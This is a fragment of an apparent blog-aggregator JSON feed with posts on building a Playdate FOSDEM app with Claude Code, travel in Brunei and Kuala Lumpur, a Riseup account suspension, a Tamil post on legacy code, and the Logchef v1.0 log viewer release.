+0000","TLDR; Software development, as it has been done for decades, is over. LLM coding tools have changed it fundamentally for the better or worse.\n“Talk is cheap. Show me the code.” — Linus Torvalds, August 2000",[],"Kailash Nadh","knadh","\u002Fimages\u002Fknadh_photo.jpg","https:\u002F\u002Fnadh.in\u002Findex.xml",{"slug":207,"title":208,"link":209,"pubDate":210,"contentSnippet":211,"tags":212,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"kurbelfahrplan","Making Kurbelfahrplan","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2026\u002F01\u002F27\u002Fkurbelfahrplan\u002F","2026-01-27T00:00:00.000Z","I recently published Kurbelfahrplan, a FOSDEM schedule\napp for the Playdate. This was the first project\nwhere I’ve been quite happy with using Claude Code for development, and used\nit much beyond Copilot autocomplete and came closer to vibe-coding.\n\nYou can see the complete development transcript\nof my claude-code session. It was interesting as a 2-day greenfield project and I\nthought it might be nice to document my learnings\u002Fprocess a little bit.\nI’d attempted building a game and an app on the playdate before (still WIP) so\nI had some experience with the tooling. I’d moved on when faced with Lua\nrefactoring challenges1.\nThis time around, I had a fairly good idea of what the final app would look like:\nthe playdate has a lot of constraints that restrict the design space, and\nexisting apps all have feature parity.\nHere’s some of the things I tried:\nSpecification\nGave a prompt to Gemini Pro and had it generate a SPEC. It included a link to the SDK,\na mention of the timezone workaround\n2 - I wanted the app to only work in UTC+1 to avoid confusion. I passed it enough context\nfrom the schedule.ics file, and on the data storage layer (make separate tables for each Devroom). I don’t have the prompt anymore but it was something like:\nwrite a specification (passed to claude code) for a playdate lua app that will be a fosdem schedule calendar app. See\nplaydate docs at $link. At launch, we want to check the timezone by doing a diff between\nepochFromTime and epochFromGMTTime, and then download the latest schedule in ICS format\nfrom $link. Save the schedule as multiple tables in lua, one table for each category.\nCreate a browser using playdate gridview, display title and location in the first line\nand a scrollable list of talks below it.\nOnly use the DTSTART, DTEND, SUMMARY, CATEGORIES, URL, LOCATION fields from the ICS file.\nThe user should be able to switch the category with left\u002Fright as well as the crank\nRespect shouldDisplay24HourTime\non selecting a talk, show a talk details page with the title, and a QR code for the talk.\nI corrected the SPEC a bit, and you can see it (very lightly edited since)\nin the repo\nDay 1\nI assumed that Claude wouldn’t have enough training data on Playdate APIs, so I went through the SDK docs,\nand copied out whatever I felt relevant to a txt file. In my case, I didn’t care for video, audio, and most graphics\nAPIs. This turned out to be 89KB of text. Passed it along with the spec to the Opus in the first\nsession, which immediately got lost in trying to fetch the schedule, so I had to wget it and force it to\nonly read 100 lines. The plan it generated looked okay, so I went ahead.\nFixing Bugs and Progress\nThe first version was buggy (it did compile), but none of the bugs were major and I got it working in a few more\nprompts and manual fixes.\nThe timezone code was incorrect, at the first sight.\nAsked for name suggestions, picked the first one.\nRan the app on the simulator, and it broke because it tried to use the network permission incorrectly.\nA lot of effort on fixing unicode problems (I attempted to solve this at first on the playdate layer, but moved it to python scripts that fetch and parse the schedule).\nLaunched the app on device to realize: Parsing a really large ICS file times out on the device, and generating QR codes takes 15-20 seconds. Switched both to build time. The playdate docs suggest pre-generating QR codes.\nLots of layout bugs. In particular, the talk text on the schedule list was never visible and no prompting fixed it - it assumed a black\u002Fwhite color and paint mode bug. I went in and looked and the font height was generated and was too low. This was however expected in the absence of a fast feedback loop.\nI’d often write one-time scripts with a prompt like:\n    \n\nWrite a Python script inside scripts directory that has zero dependencies,\nfetches https:\u002F\u002Ffosdem.org\u002F2026\u002Fschedule\u002Fical, parses the ICS and saves it as\na large JSON array of arrays. Each item in the large array is a event. The\nevent is represented as a list of [ID, SUMMARY,\nCATEGORIES,LOCATION,DTSTART,DTEND] ID is extracted from the URL\n(https:\u002F\u002Ffosdem.org\u002F2026\u002Fschedule\u002Fevent\u002FL3BK7S-free-as-in-burned-out\u002F ->\nL3BK7S). We do not use any keys to compact space.\n\n    \nDecided to remove the Network Sync code, since I could not parse the fetched content at runtime anyway.\nGenerated a HACKING.md to document the code so i can pick up the session.\nFixed a few more silly state bugs.\nDay 2 Progress\nI decided to tackle the harder problems, and they were one-shotted fairly nicely:\nA Devroom configuration page to configure which rooms to show.\nCreate a stands browser\nHave a home page landing UI.\nMaps View\nSaved talks\nAbout Page (inheriting the work from the Talk View)\nThe code for all of these features is not very elegant, but I didn’t care that much - it was\nfunctional and performant for an app that nobody uses beyond 2 days.\nMaps\nI attempted to resize and clean up the maps manually but it was too much\neffort (Building H map in the app is mine). Then went with Gemini Pro to get\na dithered map out instead, which wasn’t perfect either and looked worse at\nbeing scaled down. Switched to a “pan view” instead and that worked okay.\nStill not very happy here3 - I might switch to the maps that are used in the\nFOSDEM iOS app instead.\nOverall Notes\nI’d rate Claude’s contribution at somewhere around 60% - I found it faster to\nmanually fix lots of bugs (also realizing that there is an extra overhead in\nunderstanding the code before I can actually fix it). However, things where I\ndon’t have experience - Game state management, input handling - I was able to\nrely on Claude to get it mostly right. I used Opus throughout the project,\nand this is the first model where it writes code that is similar in shape to what\nI’d write.\nSee you at FOSDEM?\nIf you’d like to try the app, come say Hi at FOSDEM. I’ll be at the FOSS United Booth\nin Building K, Level 2. Or drop me a message. Bug reports are accepted in\nperson only. Kurbelfahrplan is Beerware, so buy me a beer if you like it!\nI wanted to switch from my custom list view to the gridview in the Playdate SDK and it took me too much time and effort to make the refactor work. ↩\nThere is no way to get timezone in the playdate lua SDK, so you need a workaround. ↩\nOne of my ideas is to switch to a leaflet maptile renderer instead and pre-fetch all tiles from https:\u002F\u002Fnav.fosdem.org\u002F. ↩",[],"Nemo","captn3m0","\u002Fimages\u002Fcaptn3m0_photo.jpg","https:\u002F\u002Fcaptnemo.in\u002Fatom.xml",{"slug":218,"title":219,"link":220,"pubDate":221,"contentSnippet":222,"tags":223,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"e0-ae-ae-e0-ae-be-e0-ae-b1-e0-af-8d-e0-ae-b1-e0-ae-99-e0-af-8d-e0-ae-95-e0-ae-b3-e0-af-87-e0-ae-b5-e","மாற்றங்களே வினா, மாற்றங்களே விடை!","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2026\u002F01\u002F19\u002F%e0%ae%ae%e0%ae%be%e0%ae%b1%e0%af%8d%e0%ae%b1%e0%ae%99%e0%af%8d%e0%ae%95%e0%ae%b3%e0%af%87-%e0%ae%b5%e0%ae%bf%e0%ae%a9%e0%ae%be-%e0%ae%ae%e0%ae%be%e0%ae%b1%e0%af%8d%e0%ae%b1%e0%ae%99%e0%af%8d\u002F","Mon, 19 Jan 2026 18:56:48 +0000","நீங்கள் ஒரு நாள் சரியாக இல்லாத (messy) code-ஐ கண்டிப்பாக நிச்சயமாக ஏதோ ஒரு வழியில் பெறுவீர்கள்.அதை எழுதிய developer-ஐ கேலி செய்ய வேண்டாம். சில சமயங்களில் அது நீங்கள் எழுதியதாக கூட இருக்கலாம். பல developers ஒரு file-ஐத் திறந்தவுடன்,“இந்த குப்பையை யார் எழுதியது ? எல்லாத்தையும் rewrite பண்ணிடலாம்” என்று சொல்வதை நான் பார்த்திருக்கிறேன். ஆனால் Context மிகவும் முக்கியம். அந்த நிர: அதனால் code-ஐ மட்டும் பார்த்து தீர்ப்பு சொல்லக் கூடாது. இதற்கு […]",[224,225,226,227,228],"Uncategorized","legacy","philosophy","programming","refactoring",{"slug":230,"title":231,"link":232,"pubDate":233,"contentSnippet":234,"tags":235,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"brunei","My experiences in Brunei","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fbrunei\u002F","Sat, 17 Jan 2026 22:45:23 +0530","In December 2024, Badri and I went to Brunei’s capital, Bandar Seri Begawan. Brunei—officially Brunei Darussalam—is a country in Southeast Asia, located on Borneo Island. It is one of the few remaining absolute monarchies on Earth.\nOn the morning of the 10th of December 2024, we reached Brunei International Airport by taking a flight from Kuala Lumpur. Upon arrival at the airport, we had to go through immigration, of course. When I was standing in the queue, I was reminded that I hadn’t filled out my arrival card. So I filled it out and submitted it online while I was in the queue.\nThe immigration officer asked me how much cash I was carrying of each currency. After completing the formalities, the immigration officer stamped my passport and let me in. Take a look at Brunei’s entry stamp in my passport.\n\n      \nBrunei entry stamp on my passport. Picture by Ravi Dwivedi, released under CC-BY-SA 4.0.\nWe exchanged Singapore dollars to get some Brunei dollars at the airport. The Brunei dollar was pegged 1:1 with the Singapore dollar, meaning 1 Singapore dollar equals 1 Brunei dollar. The exchange rate we received at the airport was the same.\nOur (pre-booked) accommodation was located near Gadong Mall. So, we went to the information center at the airport to ask how to get there by public transport. However, the person at the information center told us that they didn’t know the public transport routes and suggested we take a taxi instead.\nWe came out of the airport and came across an Indian with a bus. The bus seemed more like a minibus by Indian standards. He offered to drop us at our accommodation for 10 Brunei dollars (₹630). As we were tired after a sleepless night, we didn’t negotiate and took the offer. There was nobody else on the bus, and it felt a bit weird using the minibus as our private taxi.\nIn around half an hour, we reach our accommodation. The place was more like a guest house than a hotel. In addition to the rooms, it had common space consisting of a hall, a kitchen, and a balcony.\n\n      \nOur room in Brunei. Picture by Ravi Dwivedi, released under CC-BY-SA 4.0\nUpon reaching the place, we paid for our room in cash, which was 66.70 Singapore dollars (4200 Indian rupees) for two nights. We arrived before the check-in time, so we had to wait for our room to get ready before we entered.\nThe room had a double bed and also a place to hang clothes. We slept for a few hours before going out at night. We went into Gadong Mall and had coffee at a café named The Coffee Bean & Tea Leaf. The regular caffe latte I had here was 5.20 Brunei dollars. On another note, the snacks we got in Kuala Lumpur covered us for the dinner.\nThe next day—11th of December 2024—we went to a nearby restaurant named Nadj for lunch. The owner was from Kerala. Here we ordered:\n1 paneer pepper masala for 5 Brunei dollars (320 rupees)\n1 nasi goreng pattaya biasa for 4.50 Brunei dollars (290 rupees)\n1 plain naan for 1.50 Brunei dollars (100 rupees)\n1 butter naan for 1.80 Brunei dollars (115 rupees)\nSo, our lunch cost a total of 12.80 Brunei dollars (825 rupees). I didn’t like the fact that the naan was unusually thick.\nAfter the lunch, we planned to visit Brunei’s famous Omar Ali Saifuddien Mosque. However, a minibus driver outside of Gadong Mall told us that the mosque would be closed in half an hour and suggested we visit the nearby Jame’ Asr Hassanil Bolkiah Mosque instead.\n\n      \nJame’ Asr Hassanil Bolkiah Mosque. Picture by Ravi Dwivedi, released under CC-BY-SA 4.0\nHe dropped us there for 1 Brunei dollar per person, which seemed like the standard rate for any bus ride in Brunei. The person hailed from Uttar Pradesh and told us about bus routes in Hindi. Bus routes in Brunei were confusing, so the information he gave us was valuable.\nIt was evening, and we had the impression that the mosque and its premises were closed. However, soon enough, we stumbled across an open gate entering the mosque complex. We walked inside for some time, took pictures, and exited. Walking in Bandar Seri Begawan wasn’t pleasant, though. The pedestrian infrastructure wasn’t good.\nThen we walked back to our place and bought some souvenirs. For dinner and breakfast, we bought bread, fruits, and eggs from local shops, as we had a kitchen to cook for ourselves.\nThe guest house also had a washing machine (free of charge), which we wanted to use. However, they didn’t have detergent. Therefore, we went outside to get some detergent. It was 8 o’clock, and most of the shops were closed already. Others had detergents in large sizes, the ones you would use if you lived there. We ended up getting a small packet at a supermarket.\nThe next day—the 12th of December—we had a flight to Ho Chi Minh City in Vietnam with a long layover in Kuala Lumpur. We had breakfast in the morning and took a bus to Omar Ali Saifuddien Mosque. The mosque was in prayer session, so it was closed for Muslims. Therefore, we just took pictures from the outside and took a bus to the airport.\n\n      \nOmar Ali Saifuddien Mosque. Picture by Ravi Dwivedi, released under CC-BY-SA 4.0\nWhen the bus reached near the airport, the bus went straight rather than taking a left turn for the airport. Initially, I thought the bus would just take a turn and come back. However, the bus kept going away from the airport. Confused by this, I asked other passengers if the bus was going to the airport. The driver stopped the bus at Muara Town terminal— 20 km from the airport. At this point, everyone alighted, except for us. The driver went to a nearby restaurant to have lunch.\nI felt very uncomfortable stranded in a town that was 20 km from the airport. We had a lot of time, but I was still worried about missing our flight, as I didn’t want to get stuck in Brunei. After waiting for 15 minutes, I went inside the restaurant and reminded the driver that we had a flight in a couple of hours and needed to go to the airport. He said he will leave soon.\nWhen he was done with his lunch, he drove us to the airport. It was incredibly frustrating. On a positive note, we saw countryside in Brunei that we would not have seen otherwise. The bus ride cost us 1 Brunei dollar each.\n\n      \nA shot of Brunei’s countryside. Picture by Ravi Dwivedi, released under CC-BY-SA 4.0.\nThat’s it for this one. Meet you in the next one. Stay tuned for the Vietnam post!\nThanks to Badri for proofreading.",[],{"slug":237,"title":238,"link":239,"pubDate":240,"contentSnippet":241,"tags":242,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-1","A Consciousness is A Dedekind Cut","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fconsciousness-lives-in-a-dedekind-cut\u002Findex.html","Fri, 16 Jan 2026 00:00:00 +0000","Aiming for last place at the 2025 Berggruen Prize Open Essay Contest, on the theme of consciousness, intelligence, and the nature of mind in an age of advancing artificial systems.",[55,243,244,245,246],"writing","ai","intelligence_augmentation","tools_for_thought",{"slug":248,"title":249,"link":250,"pubDate":251,"contentSnippet":252,"tags":253,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"suspension-of-my-riseup-account","Why my Riseup account got suspended (and reinstated)","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fsuspension-of-my-riseup-account\u002F","Wed, 07 Jan 2026 23:54:04 +0530","Disclaimer: The goal of this post is not to attack Riseup. In fact, I love Riseup and support their work.\nStory\nRiseup is an email provider, known for its privacy-friendly email service. The service requires an invite from an existing Riseup email user to get an account.\nI created my account on Riseup in the year 2020, of course with the help of a friend who invited me. Since then, I have used the email address only occasionally, although it is logged into my Thunderbird all the time.\nFast-forward to the 4th of January 2026, when Thunderbird suddenly told me that it could not log in to my Riseup account. When I tried logging in using their webmail, it said “invalid password”. Finally, I tried logging in to my account on their website, and was told that…\nLog in for that account is temporary suspended while we perform maintenance. Please try again later.\nAt this point, I suspected that the Riseup service itself was facing some issues. I asked a friend who had an account there if the service was up, and they said that it was. The issue seemed to be specific only to my account.\nI contacted Riseup support and informed them of the issue. They responded the next day (the 5th of January) saying:\nThe my-username-redacted account was found inviting another account that violated our terms of use. As a security measure we suspend all related accounts to ToS violations.\n(Before we continue, I would like to take a moment and reflect upon how nice it was to receive response from a human rather than an AI bot—a trend that is unfortunately becoming the norm nowadays.)\nI didn’t know who violated their ToS, so I asked which account violated their terms. Riseup told me:\nusername-redacted@riseup.net attempted to create aliases that could be abused to impersonate riseup itself.\nI asked a friend whom I invited a month before the incident, and they confirmed that the username belonged to them. When I asked what they did, they told me they tried creating aliases such as floatup and risedown. I also asked Riseup which aliases violated their terms, but their support didn’t answer this.\nI explained to the Riseup support that the “impersonation” wasn’t intentional, that the user hadn’t sent any emails, and that I had been a user for more than 5 years and had donated to them in the past.\nFurthermore, I suggested that they should block the creation of such aliases if they think the aliases violate their terms, like how email providers typically don’t allow users to create admin@ or abuse@ email addresses.\nAfter I explained myself, Riseup reinstated my account.\nUpdate on the 10th of January 2025: My friend told me that the alias that violated Riseup’s terms was cloudadmin and his account was reinstated on the 7th of January.\nIssues with suspension\nI have the following issues regarding the way the suspension took place —\nThere was no way of challenging the suspension before the action was taken\nThe action taken against me was disproportionate. Remember that I didn’t violate any terms. It was allegedly done by a user I invited. They could just block the aliases while continuing the discussion in parallel.\nI was locked out of my account with no way of saving my emails and without any chance to migrate. What if that email address was being used for important stuff such as bank access or train tickets? I know people who use Riseup email for such purposes.\nThe violation wasn’t even proven. I wasn’t told which alias violated the terms and how could that be used to impersonate Riseup itself\nWhen I brought up the issue of me getting locked out of my account without a way of downloading my emails or migrating my account, Riseup support responded by saying:\nYou must understand that we react [by] protecting our service, and therefore we cannot provide notice messages on the affected accounts. We need to act preventing any potential damage to the service that might affect the rest of the users, and that measure is not excessive (think on how abusers\u002Fspammers\u002Fscammers\u002Fetc could trick us and attempt any action before their account is suspended).\nThis didn’t address my concerns, so let’s move on to the next section.\nRoom for improvement\nHere’s how I think Riseup’s ban policy could be changed while still protecting against spammers and other bad actors:\nEven if Riseup can’t provide notice to blocked accounts, perhaps they can scale back limitations on the inviting account which wasn’t even involved—for example, by temporarily disabling invites from that account until the issue is resolved.\nIn this case, the person didn’t impersonate Riseup, so Riseup could have just blocked the aliases and let the user know about it, rather than banning the account outright.\nRiseup should give blocked users access to their existing emails so they have a chance to migrate them to a different provider. (Riseup could disable SMTP and maybe incoming emails but keep IMAP access open). I know people who use Riseup for important things such as bank or train tickets, and a sudden block like this is not a good idea.\nRiseup should factor in the account profile in making these decisions. I had an account on their service for 5 years and I had only created around 5 invites. (I don’t remember the exact number and there’s no way to retrieve this information.) This is not exactly an attacker profile. I feel long-term users like this deserve an explanation for a ban.\nI understand Riseup is a community-run service and does not have unlimited resources like big corporations or commercial email providers do. Their actions felt disproportionate to me because I don’t know what issues they face behind the scenes. I hope someone can help to improve the policies, or at least shed light on why they are the way they are.\nSigning off now. Meet you in the next one!\nThanks to Badri and Contrapunctus for reviewing this blog post",[],{"slug":255,"title":256,"link":257,"pubDate":258,"contentSnippet":259,"tags":260,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"lifes-purpose","Life’s Purpose","https:\u002F\u002Fwww.prashanthudupa.com\u002Flifes-purpose\u002F","Sun, 04 Jan 2026 18:13:22 +0000","As Turiya, what is the purpose of life? The purpose of a body-mind-personality system is easy to define in terms of goals, ambitions, aspirations and so on. But, as Turiya, what really is the purpose of life? The purpose of life is to make space for Karma to express and extinguish itself. The content of […]",[148,149],{"slug":262,"title":263,"link":264,"pubDate":265,"contentSnippet":266,"tags":267,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"kuala-lumpur","Transit through Kuala Lumpur","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fkuala-lumpur\u002F","Wed, 31 Dec 2025 19:35:53 +0530","In my last post, Badri and I reached Kuala Lumpur - the capital of Malaysia - on the 7th of December 2024. We stayed in Bukit Bintang, the entertainment district of the city. Our accommodation was pre-booked at “Manor by Mingle”, a hostel where I had stayed for a couple of nights in a dormitory room earlier in February 2024.\nWe paid 4937 rupees (the payment was online, so we paid in Indian rupees) for 3 nights for a private room. From the Terminal Bersepadu Selatan (TBS) bus station, we took the metro to the Plaza Rakyat LRT station, which was around 500 meters from the hostel. Upon arriving at the hostel, we presented our passports at their request, followed by a 20 ringgit (400 rupee) deposit which would be refunded once we returned the room keys at checkout.\n\n      \nManor by Mingle - the hostel where we stayed at during our KL transit. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nOur room was upstairs and it had a bunk bed. I had seen bunk beds in dormitories before, but this was my first time seeing a bunk bed in a private room. The room did not have any toilets, so we had to use shared toilets.\nUnusually, the hostel was equipped with a pool. It also had a washing machine with dryers - this was one of the reasons we chose this hostel, because we were traveling light and hadn’t packed too many clothes. The machine and dryer cost 10 ringgits (200 rupees) per use, and we only used it once. The hostel provided complimentary breakfast, which included coffee. Outside of breakfast hours, there was also a paid coffee machine.\nDuring our stay, we visited a gurdwara - a place of worship for Sikhs - which was within walking distance from our hostel. The name of the gurdwara was Gurdwara Sahib Mainduab. However, it wasn’t as lively as I had thought. The gurdwara was locked from the inside, and we had to knock on the gate and call for someone to open it. A man opened the gate and invited us in.\nThe gurdwara was small, and there was only one other visitor - a  man worshipping upstairs. We went upstairs briefly, then settled down on the first floor.\nWe had some conversations with the person downstairs who kindly made chai for us. They mentioned that the langar (community meal) is organized on every Friday, which was unlike the gurdwaras I have been to where the langar is served every day. We were there for an hour before we left.\nWe also went to Adyar Ananda Bhavan (a restaurant chain) near our hostel to try the chain in Malaysia. The chain is famous in Southern India and also known by its short name A2B. We ordered\nan onion dosa for 10 ringgits (200 rupees),\n1 masala tea for 6 ringgits (120 rupees),\n2 pooris for 8 ringgits (160 rupees) and\n1 plate potato bajji for 7 ringgits (140 rupees).\n\n      \nDosa served at Adyar Ananda Bhavan. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nAll this came down to around 33 ringgits (including taxes), i.e. around 660 rupees. We also purchased some snacks such as murukku from there for our trip.\nWe had planned a day trip to Malacca, but had to cancel it due to rain. We didn’t do a lot in Kuala Lumpur, and it ended up acting as a transit point for us to other destinations: flights from Kuala Lumpur were cheaper than Singapore, and in one case a flight via Kuala Lumpur was even cheaper than a direct flight!\nWe paid 15,000 rupees in total for the following three flights:\nKuala Lumpur to Brunei,\nBrunei to Kuala Lumpur, and\nKuala Lumpur to Ho Chi Minh City (Vietnam).\nThese were all AirAsia flights. The cheap tickets, however, did not include any checked-in luggage, and the cabin luggage weight limit was 7 kg. We also bought quite some stuff in Kuala Lumpur and Singapore, leading to an increase in the weight of our luggage.\nWe estimated that it would be cheaper for us to take only essential items such as clothes, cameras, and laptops, and to leave behind souvenirs and other non-essentials in lockers at the TBS bus stand in Kuala Lumpur, than to pay more for check-in luggage. It would take 140 ringgits for us to add a checked-in bag from Kuala Lumpur to Bandar Seri Begawan and back, while the cost for lockers was 55 ringgits at the rate of 5 ringgits every six hours.\nWe had seen these lockers when we alighted at the bus stand while coming from Johor Bahru. There might have been lockers in the airport itself as well, which would have been more convenient as we were planning to fly back in soon, but we weren’t sure about finding lockers at the airport and we didn’t want to waste time looking.\nWe had an early morning flight for Brunei on the 10th of December. We checked out from our hostel on the night of the 9th of December, and left for TBS to take a bus to the airport. We took a metro from the nearest metro station to TBS. Upon reaching there, we put our luggage in the lockers. The lockers were automated and there was no staff there to guide us.\n\n      \nLockers at TBS bus station. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nWe bought a ticket for the airport bus from a counter at TBS for 26 ringgits for both of us. In order to give us tickets, the person at the counter asked for our passports, and we handed it over to them promptly. Since paying in cash did not provide any extra anonymity, I would advise others to book these buses online.\nIn Malaysia, you also need a boarding pass for buses. The bus terminal had kiosks for getting these printed, but they were broken and we had to go to a counter to obtain them. The boarding pass mentioned our gate number and other details such as our names and departure time of the bus. The company was Jet Bus.\n\n      \nMy boarding pass for the bus to the airport in Kuala Lumpur. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nTo go to our boarding gate, we had to scan our boarding pass to let the AFC gates open. Then we went downstairs, leading into the waiting area. It had departure boards listing the bus timings and their respective gates. We boarded our bus around 10 minutes before the departure time - 00:00 hours. It departed at its scheduled time and took 45 minutes to reach KL Airport Terminal 2, where we alighted.\nWe reached 6 hours before our flight’s departure time of 06:30. We stopped at a convenience store at the airport to have some snacks. Then we weighed our bags at a weighing machine to check whether we were within the weight limit. It turned out that we were.\nWe went to an AirAsia counter to get our boarding passes. The lady at our counter checked our Brunei visas carefully and looked for any Brunei stamps on the passports to verify whether we had used that visa in the past. However, she didn’t weigh our bags to check whether they were within the limit, and gave us our boarding passes.\nWe had more than 4 hours to go before our flight. This was the downside of booking an early morning flight - we weren’t able to get a full night’s sleep.\nA couple of hours before our flight time, we were hanging around our boarding gate. The place was crowded, so there were no seats available. There were no charging points. There was a Burger King outlet there which had some seating space and charging points. As we were hungry, we ordered two cups of cappuccino coffee (15.9 ringgits) and one large french fries (8.9 ringgits) from Burger King. The total amount was 24 ringgits.\nWhen it was time to board the flight, we went to the waiting area for our boarding gates. Soon, we boarded the plane. It took 2.5 hours to reach the Brunei International Airport in the capital city of Bandar Seri Begawan.\n\n      \nView of Kuala Lumpur from the aeroplane. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nStay tuned for our experiences in Brunei!\nCredits: Thanks to Badri, Benson and Contrapunctus for reviewing the draft.",[],{"slug":269,"title":270,"link":271,"pubDate":272,"contentSnippet":273,"tags":274,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-2","After \"AI\": Anticipating a post-LLM science & technology revolution","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fafter-ai\u002Findex.html","Mon, 29 Dec 2025 00:00:00 +0000","I, for one, welcome the coming age of the post-LLM-datacenter-overinvestment-bust-fueled backyard GPU supercomputer revolution.",[55,49,244,245,246],{"slug":276,"title":277,"link":278,"pubDate":279,"contentSnippet":77,"tags":280,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"busting-the-common-misconception-faster-languages-alone-dont-guarantee-faster-trade-execution-1fc197","Busting the Common Misconception: Faster Languages, Desktop Apps, and Broker APIs Do Not…","https:\u002F\u002Fopenalgo.medium.com\u002Fbusting-the-common-misconception-faster-languages-alone-dont-guarantee-faster-trade-execution-1fc197a6804c?source=rss-cda86e929c3------2","Fri, 26 Dec 2025 16:55:51 GMT",[80,281,282,81,82],"kit-sdk","trading",{"slug":284,"title":285,"link":286,"pubDate":287,"contentSnippet":288,"tags":289,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"logchef-v1","Logchef v1.0: The Journey to a Real Log Viewer","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Flogchef-v1\u002F","2025-12-22T00:00:00.000Z","About eight months ago I wrote about Logchef – a log viewer I’d been building to scratch my own itch with log exploration at work. Back then it was basically a nicer way to query ClickHouse without writing raw SQL every time. Today I’m shipping v1.0, and it’s evolved into something I didn’t quite expect.\n\n\nLet me walk through the major features that made it to 1.0 and some of the engineering decisions behind them.\nAlerting with Alertmanager Integration#\nIn that first post, I mentioned alerting as a “roadmap” item. It always felt like the obvious next step – you find a pattern in your logs, you want to know when it happens again.\n\n\nBut building it took longer than expected. My first attempt was a “rooms” system – a home-grown notification router with its own email, Slack, and webhook channels. I got it working, then stared at the code for notification deduplication, grouping, silencing, and escalation. All problems that Alertmanager has already solved and battle-tested in production for years.\nSo I ripped out rooms and integrated Alertmanager instead. Now Logchef just fires alerts to Alertmanager, and you get all the routing logic – Slack, PagerDuty, email, webhooks, silencing, grouping, inhibition – without me reinventing it poorly.\nThe workflow is simple: write a LogchefQL or SQL query, set a threshold (e.g., “fire if count > 100”), pick a frequency, configure severity and labels. Logchef runs your query on schedule, evaluates the threshold, and if it triggers, fires an alert. Alert history is stored with execution logs so you can debug why something fired (or didn’t).\nLogchefQL: From Toy Parser to Production Backend#\nThe query language I wrote about originally was pretty basic – just filters that compiled to SQL on the frontend. Over the months it grew into something more capable, but more importantly, I rewrote the entire parser in Go and moved it to the backend. This also opens the door for a CLI tool later – same parser, same query language, different interface.\nHere’s what LogchefQL looks like now:\nnamespace=\"prod\" AND level=\"error\" | message, trace_id\nThe pipe operator (|) selects specific columns instead of SELECT *:\nmsg.level=\"ERROR\" | timestamp, msg.request.method\nDot notation handles nested JSON fields. If your logs have a log_attributes Map column with nested data:\nlog_attributes.user.name = \"john\"\nFor keys that contain dots (common in OTEL-style logs), use quoted field syntax:\nlog_attributes.\"http.status_code\" >= 500\nWhy Move Parsing to the Backend?#\nThe original frontend parser was TypeScript. It worked, but had problems:\nInconsistency: The frontend generated SQL, but the backend had no idea what that SQL meant. Validation happened in two places.\nType-awareness: ClickHouse has Map, JSON, LowCardinality, and various string types. The frontend didn’t know the schema, so it couldn’t generate optimal SQL for each column type. For a Map(String, String) column, you want mapContains() or ['key'] access. For JSON, you want JSONExtractString(). For regular String, it’s a simple comparison.\nDebugging hell: When a query failed, was it the parser? The SQL generator? ClickHouse syntax? Everything happened client-side, invisible to server logs.\nThe new architecture is cleaner:\nFrontend                  Backend\n   |                         |\n   | --- LogchefQL query --> |\n   |                         | --> Parse (Go)\n   |                         | --> Validate against schema\n   |                         | --> Generate type-aware SQL\n   | \u003C-- SQL + results ----- | --> Execute on ClickHouse\nThe backend exposes three endpoints: \u002Flogchefql\u002Ftranslate (returns the SQL for “View as SQL”), \u002Flogchefql\u002Fvalidate (real-time validation with debouncing), and \u002Flogchefql\u002Fquery (parse, validate, execute, return results).\nMoving parsing to the backend also made the field sidebar implementation cleaner – the same schema-aware code that generates WHERE clauses can filter field values based on your current query.\nThe Field Sidebar#\nIf you’ve used Kibana, you know the interaction: click a field, see its top values, click a value to add it as a filter. It’s the fastest way to explore logs when you don’t know exactly what you’re looking for.\n\n\nBuilding this for ClickHouse required solving a few problems:\nHigh-Cardinality Fields#\nYou can’t just run SELECT DISTINCT field FROM logs on a table with billions of rows. String fields like trace_id would take forever and return millions of values.\nThe solution is a hybrid loading strategy based on column types:\nLowCardinality and Enum fields: Auto-load values when the sidebar opens. These are designed for fields with limited distinct values.\nString fields: Require an explicit click. A badge shows the count is unknown until you ask.\nComplex types (Map, Array, Tuple, JSON): Excluded. You can’t have meaningful “distinct values” for a JSON blob.\nProgressive Loading#\nEach field loads in parallel (max 4 concurrent) with a 15-second timeout. One slow or failed field doesn’t block others – you get a retry button for that specific field.\nQuery Context#\nThe sidebar respects your current query. If you’ve filtered to level=\"error\", the field values update to show only values from error logs. This happens through the backend – the field values endpoint accepts the current LogchefQL query and applies it as a WHERE clause filter. Same parser, same SQL generator, consistent results.\nQuery Cancellation#\nHit Esc and it cancels the query in ClickHouse. Without this, pressing “Cancel” would just hide the spinner – the query kept running on the server, burning resources.\nThe implementation uses ClickHouse’s query ID feature:\nSELECT * FROM logs WHERE ...\nSETTINGS query_id = 'logchef-abc123'\nWhen you hit Esc, the frontend calls a cancellation endpoint that runs:\nKILL QUERY WHERE query_id = 'logchef-abc123'\nThe original query returns an error, the UI clears, ClickHouse frees resources. Simple, but requires plumbing the query ID through every execution path.\nAI Query Assistant#\n“Write a query that finds slowest endpoints by p99” actually works. The AI generates LogchefQL or SQL based on natural language and your table schema.\n\n\nUnder the hood it uses go-openai, so any OpenAI-compatible endpoint works – OpenAI, Ollama, vLLM, whatever you prefer. The system prompt includes your table schema so the model knows what fields exist.\nThere’s also an MCP server that exposes Logchef to AI assistants like Claude Desktop, Cursor, 